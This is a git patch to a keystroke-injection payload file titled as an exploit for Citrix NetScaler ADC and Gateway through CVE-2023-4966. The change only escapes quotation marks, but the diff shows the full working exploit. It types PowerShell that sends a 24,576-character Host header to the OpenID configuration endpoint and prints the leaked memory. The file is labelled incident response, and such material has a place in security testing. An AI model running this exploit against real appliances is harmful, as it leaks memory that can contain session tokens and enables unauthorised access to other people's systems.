From fd03dfda79b4789f5e86848108318bede0a64c51 Mon Sep 17 00:00:00 2001
From: Aleff <alessandro.greco.1@protonmail.com>
Date: Sun, 9 Jun 2024 12:05:56 +0200
Subject: [PATCH] Update win-payload.txt

---
 .../win-payload.txt                            | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
index 1a2efae1..5bacf0d8 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
@@ -3,7 +3,7 @@
 * REM # Title       : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
 * REM # Author      : Aleff                                                            #
 * REM # Version	    : 1.0                                                              #
-* REM # Category	: incident-response                                                #
+* REM # Category	: incident-response                                                  #
 * REM # Target	    : Citrix NetScaler ADV; NetScaler Gateway                          #
 * REM #                                                                                #
 * REM ##################################################################################
@@ -23,35 +23,35 @@ QUACK DELAY 1000
 QUACK STRING $header_value = 'a' * 24576
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $header_value = $header_value -replace "\n", ""
+QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $headers="-H 'Host:$header_value'"
+QUACK STRING $headers=\"-H 'Host:$header_value'\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $headers = @{'Host' = $header_value}
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
+QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING if ($response.Substring(0, 3) -eq "200") {
+QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "--- Dumped memory ---"
+QUACK STRING Write-Host \"--- Dumped memory ---\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response.Substring(131050)  # 131051 - 1
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "---      End      ---"
+QUACK STRING Write-Host \"---      End      ---\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING } else {
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "Could not dump memory"}
-QUACK ENTER
\ No newline at end of file
+QUACK STRING Write-Host \"Could not dump memory\"}
+QUACK ENTER